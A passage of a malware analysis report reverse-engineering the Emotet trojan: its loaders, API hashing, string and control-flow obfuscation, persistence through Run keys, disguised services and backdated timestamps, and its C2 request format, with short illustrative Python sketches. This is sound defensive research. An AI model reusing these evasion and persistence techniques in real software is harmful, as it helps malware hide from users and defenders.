invoked several times at the beginning of FUN_0000002d() with a different argument each
time. The return values are stored in local variables and later used as function
pointers. Apparently, the function somehow resolved these arguments to function addresses.
Thus we needed to reverse engineer FUN_00000456().

Figure 16. Symbol resolving in the decrypted resource’s code
Examining FUN_00000456() , we came across a technique for resolving library symbols.
Specifically, the function retrieves the list of loaded libraries ( InLoadOrderModuleList )
from the Process Environment Block (PEB) and loops over each exported symbol of each
library. On each loop a combined hash (32-bit value) of the library name and symbol name is
calculated. If this value matches the function argument, a pointer to the address of the
corresponding function is returned (in resolveImportByHash.c we include the reverse
engineered code of the function). As soon as we understood the internals of the hashing
mechanism, we wrote a short script, generate_symbol_hashes1.py, that calculates these
hash values for every symbol of several common libraries ( ntdll.dll , kernel32.dll ,
etc) and exports them to a proper (and long) C enumeration:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-code.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/resolveImportByHash.c
https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes1.py



Figure 17. Calculated symbol hashes enumeration
After importing the generated enum in our Ghidra project (and properly retyping the function),
we had a clear view of which library functions are called later on:

Figure 18. Reverse engineered symbol resolving
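
The idea behind the enumeration can be sketched as follows. This is only an illustration of the approach, not the contents of generate_symbol_hashes1.py: the hash function below is a generic ROR-13 style placeholder and is NOT the algorithm used by the Protector (the real one is in resolveImportByHash.c), and the export lists are passed in by hand instead of being parsed from the DLLs.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by the given number of bits."""
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def placeholder_hash(library, symbol):
    """Stand-in 32-bit hash of library name plus symbol name (hypothetical)."""
    h = 0
    for ch in (library.lower() + symbol).encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h


def build_enum(exports, enum_name="SYMBOL_HASH"):
    """Render {library: [symbols]} as a C enum mapping names to hash values."""
    lines = ["typedef enum %s {" % enum_name]
    for library, symbols in sorted(exports.items()):
        prefix = library.replace(".", "_")
        for symbol in sorted(symbols):
            value = placeholder_hash(library, symbol)
            lines.append("    %s_%s = 0x%08x," % (prefix, symbol, value))
    lines.append("} %s;" % enum_name)
    return "\n".join(lines)
```

Once such an enum is imported into Ghidra and the resolver's parameter is retyped to it, every magic constant in the decompiled code is displayed as a readable library and symbol name.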
We were now able to continue reversing the FUN_0000002d() function. After a good
amount of analysis we concluded that the function is a pretty basic binary image loader with
the following function signature (in loadBinary.c we include the complete reverse engineered
code):

byte * loadBinary(byte *pe_ptr,byte *functionToRunHash,byte *functionToRunParam1,int functionToRunParam2,int copyDosHeader)

Internally, the function:

allocates the memory buffer (in which the image will be loaded) with
VirtualAlloc() ,

copies the headers from the source image,
copies the sections from the source image,
loads and links the imported symbols (libraries),
applies the relocations,

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-export-hashes-edited.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-resolved-hashes.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/loadBinary.c



applies proper memory protection to each section with VirtualProtect()  (that way
the executable sections of the loaded binary will be in executable memory sections),
runs the executable’s entry-point,
runs an exported symbol, the name of which matches the functionToRunHash  hash
value, passing the parameters functionToRunParam1  and functionToRunParam2 ,
returns a pointer to the allocated buffer.

The code at the beginning of the encrypted payload could now be translated into something
meaningful:

Figure 19. Reverse engineered entry-point
In this way, we knew that the executable included at address 0x0000052e will be loaded.
Then, the entry-point is invoked:

Figure 20. Reverse engineered code running the nested binary
When the entry-point returns, its exported symbol, i.e., an exported function with a name
matching the 0xed1c7b90  hash value, will run.

We exported the executable included at address 0x0000052e  in a separate file and loaded
it into Ghidra.

The nested executable

We loaded the nested executable in Ghidra and went straight to the entry-point. The entry-
point just calls a function with a couple of parameters.

Figure 21. The nested executable’s entry-point
You might wonder what this DAT_10004070 value is. So did we. As a result, we had a quick
look into its contents:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-loadbinary.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-run-stage3.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage3-entry.png



Figure 22. MZ magic value in the nested executable
That “MZ” signature on the right looks familiar, doesn’t it? Well, this is another nested PE
executable! It was like opening a matryoshka doll.

We reverse engineered the FUN_10001000()  function and, as you can probably guess, it
was yet another binary image loader with the following function signature:

struct_paramContainer * __cdecl loadBinary(byte *pe_ptr,uint pe_size)

Internally, it performs the following tasks:

allocates the memory buffer (in which the image will be loaded) with
VirtualAlloc() ,

copies the headers from the source image,
fixes the relocation table entries according to the offset between the allocated buffer
address and the ImageBase ,
loads and links the imported symbols (libraries),
copies the sections from the source image and applies proper memory protection to
each section with VirtualProtect()  (that way the executable sections of the loaded
binary will be in executable memory),
initializes the Thread Local Storage (TLS) according to the image TLS Section,
modifies the base addresses ( ImageBaseAddress and
LoaderData->InLoadOrderModuleList->DllBase ) of the Process Environment Block (PEB) so that
they point to the allocated buffer,

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage3-mz.png



runs the executable’s entry-point.
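
To illustrate the relocation step of such a loader, here is a minimal sketch of how base relocations are applied to a 32-bit image that has already been copied into a buffer. It follows the documented PE base relocation format (blocks of a page RVA, a block size and 16-bit entries whose upper 4 bits are the type). It is our own illustrative code, not the decompiled loader, and it only handles the IMAGE_REL_BASED_HIGHLOW type.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0  # padding entry, nothing to patch
IMAGE_REL_BASED_HIGHLOW = 3   # 32-bit absolute address, add the delta


def apply_relocations(image, reloc_rva, reloc_size, delta):
    """Patch a mapped image (bytearray) in place; return the number of fixups.

    delta is (address of the allocated buffer) - (ImageBase of the PE header).
    """
    applied = 0
    pos = reloc_rva
    end = reloc_rva + reloc_size
    while pos + 8 <= end:
        page_rva, block_size = struct.unpack_from("<II", image, pos)
        if block_size < 8:
            break  # malformed or terminating block
        for i in range((block_size - 8) // 2):
            (entry,) = struct.unpack_from("<H", image, pos + 8 + 2 * i)
            rel_type, offset = entry >> 12, entry & 0x0FFF
            if rel_type == IMAGE_REL_BASED_HIGHLOW:
                target = page_rva + offset
                (value,) = struct.unpack_from("<I", image, target)
                struct.pack_into("<I", image, target, (value + delta) & 0xFFFFFFFF)
                applied += 1
        pos += block_size
    return applied
```

For example, an image built for ImageBase 0x10000000 but loaded at 0x00500000 needs every relocated pointer shifted by 0x00500000 - 0x10000000.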

Figure 23. Reverse engineered code running the actual trojan
Once again we exported the executable included at address 0x10004070  in a separate file
that we had to explore.

Chapter 3. Overcoming the malware obfuscation techniques

Introduction

In the previous chapter, we explored the steps until the actual trojan is executed. We
observed that the downloaded executable decrypts part of itself and executes the second
stage payload. This payload, in turn, executes another payload, i.e. the executable that we
will analyze in this chapter and Chapter 4.

In this chapter, we’ll fast-forward and describe the obfuscation techniques employed by the
latter executable. This will provide us with the necessary background to further explain its
functionality in Chapter 4.

Symbol Resolution Obfuscation

The first thing that we noticed after loading the executable in Ghidra was that it does not
import any symbols. An executable of only 369 KB cannot plausibly have a Windows API
implementation statically linked. Hence, it became obvious that it was
probably using a custom mechanism to resolve symbols from system libraries.

Figure 24. Emotet trojan’s Symbol Tree

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage3-run-entry.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-symbol-tree.png



Starting from the entry-point, we noticed the following lazy initialization pattern, the result of
which is stored in a global variable and is used as a function pointer. The same pattern (and
some variations of it) is used all over the executable.

Figure 25. Symbol resolving in Emotet trojan’s entry-point
Could this be the custom symbol resolution mechanism employed by the trojan to hide the
APIs that it uses? To find out, we reverse engineered functions FUN_00404190() and
FUN_004040f0(). Indeed, these two functions work almost like FUN_00000456()
described in Chapter 2:

FUN_00404190() starts from the Thread Information Block (the address of which is
available from the FS segment register on 32-bit Windows), accesses the Process
Environment Block (PEB) and iterates over the list of loaded modules
( InLoadOrderModuleList ). For each module, it calculates the hash of its lower-cased
name and compares it against the specified parameter. If they match, the
function returns the module’s base address. Essentially, it works like
GetModuleHandle(), but instead of specifying the module’s name, the caller
specifies the module name’s hash.
FUN_004040f0() parses the module specified in the first parameter to find its export
table and iterates over the exported symbols. For each exported symbol, it calculates
the hash of its name and compares it against the value specified in the second
parameter. If they match, it either returns the address that the symbol points to (if the
symbol is an export) or recursively resolves the symbol forwarded from another module
(if the symbol is a forwarder).

This technique is called API Hashing. In findModuleByHash.c
and findModuleExportByHash.c we include the reverse engineered code of the functions.

Again, we wrote a short script, generate_symbol_hashes2.py, that calculates the hashes for
every symbol of some common libraries (e.g. ntdll.dll , kernel32.dll , etc.) and
exports them to two C enumerations:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-entry.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleByHash.c
https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleExportByHash.c
https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py



https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-resolved-module-hashes.png

Figure 26. Calculated library and symbol names hashes enumerations
After importing the enumerations in Ghidra, we had a clear view of the modules and
functions imported by these calls.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-resolved-module-exports-hashes.png



Figure 27. Emotet trojan’s reverse engineered symbol resolving

String Obfuscation

We noticed that the binary did not contain any strings. This made us suspicious because it is
impossible for an executable that performs any meaningful functionality not to contain any
strings. As a result, we assumed that some kind of string obfuscation is used. The following
is the full list of the strings that we identified.

Figure 28. List of defined strings in Emotet trojan
The first time we met the use of a string was in a call to LoadLibraryW() , the only
parameter of which is the name of the library to be loaded. The value passed
to LoadLibraryW()  is returned from function FUN_004035f0() , which in this case
operates on binary data at memory address 0x40d7f0 . It became apparent that this
function must be doing some kind of transformation (see decryption) to the data pointed to by
its input.

Figure 29. Emotet trojan’s call of string decryption function
We reverse engineered the function and confirmed our guess: its purpose is to decrypt
the input binary data to a Unicode string. The first 4 bytes of the binary data are the XOR
key, the next 4 bytes are the string’s encrypted length and the rest is the encrypted string itself.
After decrypting the length, the function iterates over all quadruples of encrypted characters
(remember that the key is 4 bytes long) until all have been decrypted.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-entry-with-resolves.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-strings.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-string-decrypt-use.png



Figure 30. Emotet trojan’s string decryption internals
For the sake of completeness, in decryptWideString.c we included the reverse engineered
code of that function.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-string-decryption.png
https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptWideString.c



Two more versions of this function exist in the executable: one that decrypts the ciphertext to
an ASCII string and one to a byte array. Luckily, all are compatible with each other as
ciphertexts are processed as 32-bit integers. Only their output types differ.
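
The layout described above (4-byte XOR key, 4-byte encrypted length, then the ciphertext processed as 32-bit integers) can be sketched as follows. This is a simplified illustration and not the code of decrypt_bytes.py. We assume little-endian integers and that the decrypted length counts plaintext bytes; encrypt_blob is a hypothetical helper that exists only to build test data.

```python
import struct


def decrypt_blob(data, offset=0):
    """Decrypt a [key][length ^ key][dwords ^ key] blob located at offset."""
    key, enc_len = struct.unpack_from("<II", data, offset)
    length = enc_len ^ key
    out = bytearray()
    pos = offset + 8
    while len(out) < length:
        (dword,) = struct.unpack_from("<I", data, pos)
        out += struct.pack("<I", dword ^ key)  # 4 plaintext bytes per step
        pos += 4
    return bytes(out[:length])  # drop the padding of the last dword


def encrypt_blob(plain, key):
    """Inverse operation, used only to produce sample input for this sketch."""
    padded = plain + b"\x00" * (-len(plain) % 4)
    out = struct.pack("<II", key, len(plain) ^ key)
    for i in range(0, len(padded), 4):
        (dword,) = struct.unpack_from("<I", padded, i)
        out += struct.pack("<I", dword ^ key)
    return out
```

The three variants in the executable would then differ only in how the returned bytes are presented: widened to a Unicode string, kept as an ASCII string, or left as a raw byte array.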

We implemented a tool to decrypt any string or byte array in the executable. The source
code can be found in decrypt_bytes.py.

$  ./decrypt_bytes.py nested-payload-2.exe 0xb9f0 
shlwapi.dll

Control Flow Obfuscation

We continued our analysis with function FUN_0406860() , the first function that the entry-
point calls, and observed some kind of control flow obfuscation. Specifically, the function’s
body is split into multiple if  blocks, wrapped in a while  loop. The flow is determined by a
control variable that is set at the end of each block. Furthermore, as seen from the function
graph below, the majority of the blocks have the same predecessor and successor blocks.
This technique resembles the Control Flow Flattening technique, in which each function is
split into basic blocks that are encapsulated in a switch  block wrapped in a while  loop.
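
To make the pattern concrete, here is a toy example of our own (unrelated to the trojan's code) showing the same function before and after this kind of transformation. The state constants are arbitrary values standing in for the opaque numbers that an obfuscator would generate.

```python
def gcd_plain(a, b):
    """Straightforward version: the control flow is visible at a glance."""
    while b != 0:
        a, b = b, a % b
    return a


def gcd_flattened(a, b):
    """Same logic, with every block dispatched through a control variable."""
    state = 0x3A1F
    while True:
        if state == 0x3A1F:    # original loop condition
            state = 0x77C2 if b != 0 else 0x0B5E
        elif state == 0x77C2:  # original loop body
            a, b = b, a % b
            state = 0x3A1F
        elif state == 0x0B5E:  # original return
            return a
```

In the flattened version every block returns to the same dispatcher, which is why most blocks in the function graph share the same predecessor and successor.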

https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-code.png



Figure 31. Emotet trojan’s Control Flow Obfuscation
This technique is also applied to the vast majority of the functions in the executable.

We were aware of techniques to automatically de-obfuscate control flow flattening (e.g. the
technique described in this quarkslab blog post), but since the size of the code was small
enough we decided to follow the flow manually.

Chapter 4. The trojan’s internals

Introduction

In the previous chapter we had a look at the trojan executable. We identified several
obfuscation techniques incorporated in the executable and described the methods we used
to overcome them. In this chapter, we will discuss the trojan’s inner functionalities.

Main flow overview

We followed a depth-first approach to reverse engineer the executable. We started from the
function FUN_0406860() , the one called by the executable’s entry-point, which we called
“main”.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-control-flow.png
https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html



Figure 32. Emotet trojan’s entry-point
Then, we followed the flow examining each function call. We did this until we reached a
function that either made no further calls or only invoked already examined functions. After a
couple of weeks we had completely studied the executable’s code.

As a result, we were able to draw the code flow of the main function in a meaningful manner.
Below, we present the main control loop of the trojan:

Figure 33. Emotet trojan’s main function flow chart

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-decompiled-entry.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-flowchart.png

The basic groups of states are highlighted:

Grey states: Initialization of internal variables.
Purple states: Persistence-related operations (running during the first run of the trojan
or after communicating with the C2 network).
Green states: Initialization of parameters related to the communication with the C2
network.
Blue states: Initialization of static data to be included in requests to the C2 network.
Orange states: Re-initialization of variable data to be included in the next request to the
C2 network.
Red states: Communication with the chosen C2 server.
Yellow state: Handling of the C2 server’s response.

Initially, the trojan loads the required libraries (states 1 and 2) and initializes its internal
variables (state 3).

Then, it checks whether it was started with command line arguments or not (state 4). The
existence of command line arguments indicates that this is the first run of a self-update. The
command line arguments contain the file path where the executable will have to migrate to.
In that case, states 8-13 perform a series of actions related to the persistence of the trojan.

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-main-flowchart.png



Specifically, any existing file in the target file-path is renamed (state 8), the current
executable is stored in the target file-path and its Zone Identifier ADS is removed (state 9).
The created file is marked as “old” by changing its timestamps (state 10). If the process runs
with administrative permissions, a new Service for the executable is created (state 11). Then,
it waits until it receives a signal from its parent process (state 12). Finally, it runs itself from
the newly created executable (state 13).

If command line arguments are absent, it is either the first run after the Protector
extracted the trojan or a later run. This is inferred by checking the executable’s
timestamp (state 5). If it is indeed a first run, any existing Services for the executable
are removed provided that the executable has administrative permissions (state 6), and then
a random legitimate-looking file-path is picked as the target for the executable file (state 7).
Then, states 8-13 run, performing the series of actions described earlier.

If it is not a first run (indicated by an “old” timestamp) and the trojan runs with
administrative permissions, it checks whether its parent process name is “services.exe”
(state 14). If so, it runs itself in a new process (state 13) and terminates the current process.

Finally, if this is not the first run (indicated by an “old” timestamp), and the trojan runs without
administrative rights or its parent process name is not “services.exe”, the C2
communication flow happens. First, a new thread that monitors the changes of the current
process’ executable filename is started (state 15). Then the control reaches state 16 and
always returns to it until the current process’ executable filename changes. That will be the
result of a self-update and after that, the trojan will wait for any threads to terminate (state
39) and then will terminate its process.

While no changes of the filename are detected, the trojan will repeatedly communicate with
C2. First, the C2 communication parameters are initialized once (states 17-20). Furthermore,
the request data regarding the host system information are also initialized once (states 21-
26). On each communication attempt, the list of the processes currently running on the
system as well as the list of active payload IDs will be included in the request (states 27-28).
Then the actual communication with C2 is performed (states 29-31). Upon a successful
communication the trojan will first check if a termination flag was received. In that case it will
immediately move its executable to the Temp folder and terminate itself (state 38).
Otherwise, any existing files in the folder containing the trojan’s executable are deleted and a
new auto-run Registry Key is created (state 32). Then, the trojan will loop over the received
payloads and execute them (state 33).

In the rest of the chapter we will focus on two main functionalities of the trojan: the
persistence mechanisms and the communication with the Command-and-Control servers.

Persistence mechanisms



The trojan treats a run as its first run if it was started with command line arguments or if the
LastWriteTime of its executable file is less than 8 days old. The timestamp is
retrieved by calling GetFileInformationByHandleEx() on a handle to the file whose path is
returned by GetModuleFileNameW().
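
The first-run decision can be summarized in a few lines. This is a sketch of the logic as we understood it, written for illustration only: the function and parameter names are ours, and the timestamp is passed in directly instead of being read from the file system.

```python
from datetime import datetime, timedelta

FIRST_RUN_WINDOW = timedelta(days=8)


def is_first_run(has_cli_args, last_write_time, now):
    """Return True if the trojan would treat this execution as a first run."""
    if has_cli_args:
        # Command line arguments mean a self-update is being installed.
        return True
    # Otherwise a "recent" LastWriteTime marks a freshly dropped executable.
    return now - last_write_time < FIRST_RUN_WINDOW
```

A file whose LastWriteTime is exactly 8 days in the past is no longer "less than 8 days old", so it is not treated as a first run.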

Upon its first run, the trojan places its executable file in a sub-folder inside one of the
following Windows Special Folders:

CSIDL_LOCAL_APPDATA  (usually C:\Users\username\AppData\Local ) if the trojan
runs without administrator rights, or
CSIDL_SYSTEMX86  (usually C:\Windows\SysWOW64 ) if the trojan runs with
administrator rights.

The sub-folder name and the filename of the malware depend on whether
the executable was run with command line arguments or not:

With no command line parameters, the malware chooses two random files from the
legitimate executable (.exe) and library (.dll) files contained in the CSIDL_SYSTEM
(usually C:\Windows\System32 ) folder. The names of these randomly chosen files
are used to define the name of the sub-folder that the malware will be stored in, as well
as the filename that the trojan will be stored with inside this sub-folder.
When invoked with command line parameters, the sub-folder name and filename for
the malware are parsed from the base64-encoded command line argument. The
structure of the base64-decoded command line argument is described in detail in the
Responses from C2 section.

Furthermore, it deletes the corresponding Zone.Identifier Alternate Data Stream
(which is added by the web client to mark files downloaded from external sites as possibly
unsafe to run).

Finally, all the timestamp attributes of the file ( CreationTime , LastAccessTime ,
LastWriteTime and ChangeTime ) are set to 8 days in the past. In this way, the next time
the malware runs, it will be aware that it is not the first time.

To achieve persistence, two different methods are used:

1. Registry Key: Upon receiving a C2 response, it creates a value under
the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
registry key. The value type is String ( REG_SZ , 0x1 ), its name is the filename of
the trojan and its data is the full path inside the Windows Special Folder.



2. System Service: Upon its first run, if running with administrator rights, it creates a new
Service. The Service type is SERVICE_WIN32_OWN_PROCESS ( 0x10 ) and its binary
path is the full path inside the Windows Special Folder. Once the service is created, it
picks a random legitimate service from the list returned
by EnumServicesStatusExW() and copies its description to the malicious service,
using QueryServiceConfig2W() and ChangeServiceConfig2W() respectively,
making it difficult to distinguish from legitimate services.

Command-and-Control

After achieving persistence, the trojan tries to communicate with one of the Command and
Control (C2) servers to inform it about the compromised system and retrieve the payloads to
execute. Emotet’s C2 network consists of multiple C2 servers with different C2 servers
having different up-times, achieving redundancy and lowering the probability of detection. In
total, we identified 126 unique C2 servers spread all over the world, mainly located in
Europe, the Americas and south-east Asia:

Figure 34. Emotet’s Command-and-Control server locations
The trojan binaries come with the list of IPv4 addresses and ports of all C2 servers
embedded. The C2 servers are tried sequentially, until one responds successfully. On the
first run, the trojan starts from the first C2 server of the list. On all subsequent runs, it
continues from the last C2 server that responded successfully. We again wrote a short script
to automatically extract the IPv4 addresses and ports from the binaries, which can be found
in extract_c2_socket_addresses.py. Finally, all C2 servers share a common private key
which is used for protecting the communication between the trojan and the C2 server. The
public key is also embedded in the trojan binaries, albeit encrypted.
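
The server selection described above can be sketched as a simple sequential scan. This is an illustration under assumptions: the wrap-around to the start of the list once the end is reached is our guess, the try_server callback stands in for the real HTTP exchange, and the addresses in any example should come from the documentation range 192.0.2.0/24 and not from the real C2 list.

```python
def pick_c2(servers, try_server, start_index=0):
    """Try servers one by one starting at start_index.

    Returns the index of the first server that responds, or None if none does.
    On later runs the caller passes the last index that responded.
    """
    count = len(servers)
    for step in range(count):
        index = (start_index + step) % count  # assumed wrap-around
        if try_server(servers[index]):
            return index
    return None
```

From a defender's point of view, this behaviour means that a compromised workstation may contact several listed addresses in a row before settling on one, so a single blocked connection is still a useful indicator.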

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-trojan-c2-network-map.png
https://github.com/grnet/emotet-utils/blob/master/utilities/extract_c2_socket_addresses.py



Data exchange between the trojan and the C2 server utilizes a complex serialization and
deserialization mechanism, which includes compression and encryption of both the request
and response data. The actual communication takes place over plain HTTP, presumably to
evade protections based on flagged TLS certificates. During the trojan’s initialization phase,
the C2’s RSA-768 public key is decrypted (using the decryption function described in the
previous chapter) and a random AES-128 session key is generated (using the Windows
Crypto API). The public key is used to encrypt the session key and verify the response and
the session key to encrypt the request and decrypt the response. The encrypted session key
is included in the request so that the C2 server can decrypt the request payload. Finally,
SHA-1 is used for hashing.

The primitive data types used in the exchanged messages are the byte , the char  and
the uint  (32-bit). The non-primitive data types are struct Bytes  and struct String ,
as shown in the following code snippet:

struct Bytes { 
   byte *buffer; 
   uint size; 
};
 
struct String { 
   char *buffer; 
   uint length; 
};

All primitive data types are serialized in little-endian byte order. A struct Bytes
is serialized to the size of the buffer followed by the actual bytes of the buffer. A struct
String  is serialized to the length of the string followed by the characters of the string,
excluding the null terminator.
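
These serialization rules can be sketched with Python's struct module. The helper names are ours. We assume that the size and length prefixes are themselves 32-bit little-endian uint values (matching the struct field types) and that characters are single bytes.

```python
import struct


def ser_uint(value):
    """Serialize a 32-bit unsigned integer in little-endian byte order."""
    return struct.pack("<I", value)


def ser_bytes(buffer):
    """Serialize a struct Bytes: size prefix followed by the raw bytes."""
    return ser_uint(len(buffer)) + buffer


def ser_string(text):
    """Serialize a struct String: length prefix, then chars, no terminator."""
    raw = text.encode("ascii")
    return ser_uint(len(raw)) + raw
```

For instance, under these assumptions the uint value 1000 becomes the bytes e8 03 00 00, and the string "abc" becomes 03 00 00 00 followed by the three characters.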

Request Payload

The trojan uses information gathered from the compromised system to assemble the request
payload. This includes information that can be used to uniquely identify the system,
information about the operating system and the running processes as well as the current
state of the trojan itself. Upon analyzing the binary, we concluded that the structure of the
request payload as used internally by the trojan is the following:

struct RequestPayload { 
   struct String systemId; 
   uint systemInfo; 
   uint rdpSessionId; 
   uint date; 
   uint value_1000; 
   struct String otherProcessExecutableNames; 
   struct Bytes payloadIds; 
   uint currentProcessExecutablePathHash; 
};



The request payload struct is serialized by serializing its fields and concatenating them in
the order they appear, as shown in the image below.

Figure 35. Emotet’s

serialized request payload
systemId

The ID assigned to the compromised system. It is constructed using the format string
%s_%08X, where the first specifier corresponds to the computer name and the second
specifier to the volume serial number of the disk partition where Windows is installed. To
get the computer name, GetComputerNameA() is used. To get the volume serial number,
GetWindowsDirectoryW() is used to get the drive letter of the partition where Windows
is installed and then GetVolumeInformationW() is utilized to get the volume serial
number of that partition. Non-letter and non-digit characters in the computer name are
replaced by the character X. For example, for the compromised system with computer
name DESKTOP-K1C601 and volume serial number B4A6-FEC6, the value of systemId
would be DESKTOPXK1C601_B4A6FEC6.
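The construction of systemId can be reproduced with the short Python sketch below. The function name is hypothetical, and the computer name and volume serial number are passed in as arguments rather than queried through the Windows API. "Letter" and "digit" are assumed to mean ASCII letters and digits.

```python
def build_system_id(computer_name: str, volume_serial: int) -> str:
    """Build the system ID using the %s_%08X format string."""
    # Replace every character that is not an ASCII letter or digit with 'X'.
    sanitized = "".join(
        ch if ch.isascii() and ch.isalnum() else "X" for ch in computer_name
    )
    return "%s_%08X" % (sanitized, volume_serial)


# Volume serial number B4A6-FEC6 expressed as a 32-bit integer.
print(build_system_id("DESKTOP-K1C601", 0xB4A6FEC6))  # DESKTOPXK1C601_B4A6FEC6
```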

systemInfo

A numeric value that encodes information regarding the OS and the architecture of the
compromised system. The trojan uses RtlGetVersion()  and GetNativeSystemInfo()
to get the OSVERSIONINFOEXW and SYSTEM_INFO structures, respectively. The numeric value
is constructed as shown below:

OSVERSIONINFOEXW.wProductType * 100000 + OSVERSIONINFOEXW.dwMajorVersion * 1000 + 
OSVERSIONINFOEXW.dwMinorVersion * 100 + SYSTEM_INFO.wProcessorArchitecture

For example, the systemInfo  value of 110009  means that the operating system is
Windows 10 and the processor architecture is x64:

wProductType : 1 ( VER_NT_WORKSTATION )
dwMajorVersion : 10
dwMinorVersion : 0
wProcessorArchitecture : 9 ( PROCESSOR_ARCHITECTURE_AMD64 )
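The arithmetic can be checked with a small Python sketch. The function name is ours and the four inputs are passed in directly instead of being read from the Windows structures.

```python
def encode_system_info(product_type: int, major: int, minor: int, arch: int) -> int:
    """Combine the OS and architecture fields into the systemInfo value."""
    return product_type * 100000 + major * 1000 + minor * 100 + arch


# Windows 10 workstation on x64, as in the example above.
print(encode_system_info(1, 10, 0, 9))  # 110009
# Windows 7 (version 6.1) workstation on x64.
print(encode_system_info(1, 6, 1, 9))   # 106109
```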

rdpSessionId

The Remote Desktop Services session under which the current process is running. The
trojan uses GetCurrentProcessId()  to get the current process ID and
ProcessIdToSessionId()  to convert the process ID to the RDP session ID.

date

The value 20200416 is hardcoded in the request payload, which can presumably be
decoded to the date April 16, 2020. This could be the date that the current campaign
started; however, this cannot be confirmed.
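If the value is indeed a date in YYYYMMDD form, which is our reading rather than something confirmed from the binary, it can be decoded as in the following sketch (the function name is hypothetical):

```python
from datetime import date, datetime


def decode_date(value: int) -> date:
    """Interpret an integer such as 20200416 as a YYYYMMDD date."""
    return datetime.strptime(str(value), "%Y%m%d").date()


print(decode_date(20200416))  # 2020-04-16
```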

value_1000

The value 1000  is hardcoded in the request payload. Its purpose is unknown.

otherProcessExecutableNames

A comma-separated list of the names of all processes running in the system, except for the
current and the parent processes. The trojan uses CreateToolhelp32Snapshot()  to take
a snapshot of all processes in the system and Process32FirstW() / Process32NextW()
to iterate over them. The current and the parent processes are filtered out. For example:

SearchFilterHost.exe,SearchProtocolHost.exe,Taskmgr.exe,conhost.exe,PowerShell.exe,not
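The filtering and joining step can be sketched in Python as follows. The process snapshot is modelled as a plain list of (process ID, executable name) tuples, the sample values are made up, and matching the current and parent processes by process ID is our assumption about how the filter works.

```python
def other_process_names(processes, current_pid, parent_pid):
    """Join the names of all processes except the current and parent ones."""
    excluded = {current_pid, parent_pid}
    return ",".join(name for pid, name in processes if pid not in excluded)


# Hypothetical snapshot: the trojan runs as PID 5000 with parent PID 4120.
snapshot = [
    (4120, "explorer.exe"),
    (5000, "reg.exe"),
    (612, "conhost.exe"),
    (988, "Taskmgr.exe"),
]
print(other_process_names(snapshot, current_pid=5000, parent_pid=4120))
# conhost.exe,Taskmgr.exe
```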

https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/ns-sysinfoapi-system_info
https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw



payloadIds

The IDs of the payloads received from the C2 server that are currently running. To support
this functionality, the C2 server assigns an ID to every payload and the trojan maintains an
in-memory list of the active payloads. Using this value, the C2 server is informed about the
payloads that are currently running. The list of IDs is represented as an array of unsigned
integers. For example, if the payloads with IDs 2643 , 2647 , and 2759  are currently
running, the value of payloadIds  would be:

53 0a 00 00 57 0a 00 00 c7 0a 00 00
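The byte sequence above can be reproduced in Python by packing each ID as a 4-byte little-endian unsigned integer. The helper names are ours.

```python
import struct


def pack_payload_ids(ids):
    """Pack payload IDs as consecutive 4-byte little-endian unsigned integers."""
    return struct.pack("<%dI" % len(ids), *ids)


def unpack_payload_ids(raw):
    """Recover the list of payload IDs from the packed representation."""
    return list(struct.unpack("<%dI" % (len(raw) // 4), raw))


packed = pack_payload_ids([2643, 2647, 2759])
print(packed.hex(" "))             # 53 0a 00 00 57 0a 00 00 c7 0a 00 00
print(unpack_payload_ids(packed))  # [2643, 2647, 2759]
```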

currentProcessExecutablePathHash

The hash of the full path of the current process’ executable, lower-cased. The trojan uses
GetModuleFileNameW() to get the path and a custom hash function to hash the path, the
reverse engineered version of which can be found in hashLowercase.c. For example, if the
path of the trojan’s executable was C:\Users\IEUser\AppData\Local\dxdiag\reg.exe,
the hash value would be 0x9f955b9.
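Putting the fields of this subsection together, the serialized request payload can be assembled as in the Python sketch below. It is an illustration under stated assumptions rather than a copy of our client: the class and helper names are hypothetical, length prefixes are assumed to be 4-byte uints, strings are assumed to use one byte per character, and the RDP session ID and process list in the usage example are made up. The path hash is supplied as a precomputed value because the custom hash function is not reproduced here.

```python
import struct
from dataclasses import dataclass
from typing import List


def _uint(value: int) -> bytes:
    return struct.pack("<I", value)


def _length_prefixed(data: bytes) -> bytes:
    # Shared layout of struct Bytes and struct String: size, then contents.
    return _uint(len(data)) + data


@dataclass
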